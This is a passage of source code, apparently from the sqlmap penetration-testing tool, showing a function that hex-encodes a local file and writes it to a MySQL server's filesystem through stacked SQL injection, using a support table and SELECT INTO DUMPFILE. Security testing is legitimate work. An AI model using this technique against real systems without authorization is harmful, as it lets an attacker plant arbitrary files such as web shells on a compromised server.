(self, localFile, remoteFile, fileType, forceCheck=False)
| 146 | return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) |
| 147 | |
| 148 | def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): |
| 149 | debugMsg = "creating a support table to write the hexadecimal " |
| 150 | debugMsg += "encoded file to" |
| 151 | logger.debug(debugMsg) |
| 152 | |
| 153 | self.createSupportTbl(self.fileTblName, self.tblField, "longblob") |
| 154 | |
| 155 | logger.debug("encoding file to its hexadecimal string value") |
| 156 | fcEncodedList = self.fileEncode(localFile, "hex", False) |
| 157 | |
| 158 | debugMsg = "forging SQL statements to write the hexadecimal " |
| 159 | debugMsg += "encoded file to the support table" |
| 160 | logger.debug(debugMsg) |
| 161 | |
| 162 | sqlQueries = self.fileToSqlQueries(fcEncodedList) |
| 163 | |
| 164 | logger.debug("inserting the hexadecimal encoded file to the support table") |
| 165 | |
| 166 | inject.goStacked("SET GLOBAL max_allowed_packet = %d" % (1024 * 1024)) # 1MB (Note: https://github.com/sqlmapproject/sqlmap/issues/3230) |
| 167 | |
| 168 | for sqlQuery in sqlQueries: |
| 169 | inject.goStacked(sqlQuery) |
| 170 | |
| 171 | debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) |
| 172 | logger.debug(debugMsg) |
| 173 | |
| 174 | # Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html |
| 175 | inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, remoteFile), silent=True) |
| 176 | |
| 177 | return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) |
nothing calls this directly
no test coverage detected